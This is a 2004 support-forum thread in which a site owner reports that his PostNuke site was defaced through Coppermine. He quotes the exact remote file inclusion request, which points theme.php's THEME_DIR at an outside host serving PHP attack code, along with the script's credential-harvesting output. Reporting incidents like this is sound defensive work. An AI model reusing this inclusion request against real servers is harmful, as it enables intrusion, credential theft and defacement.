Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: PostNuke Coppermine Gallery Security Error  (Read 16162 times)

0 Members and 1 Guest are viewing this topic.

PsyVision

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
PostNuke Coppermine Gallery Security Error
« on: October 12, 2004, 01:35:33 pm »
hey,

I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?
« Last Edit: October 13, 2004, 12:20:18 am by GauGau »
Logged

Tranz

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: 00
  • Offline Offline
  • Gender: Female
  • Posts: 6149
Re: PostNuke Coppermine Gallery Security Error
« Reply #1 on: October 12, 2004, 04:42:41 pm »
« Last Edit: October 12, 2004, 04:48:36 pm by TranzNDance »
Logged
Pages: [1]   Go Up
« previous next »
 

Page created in 0.015 seconds with 15 queries.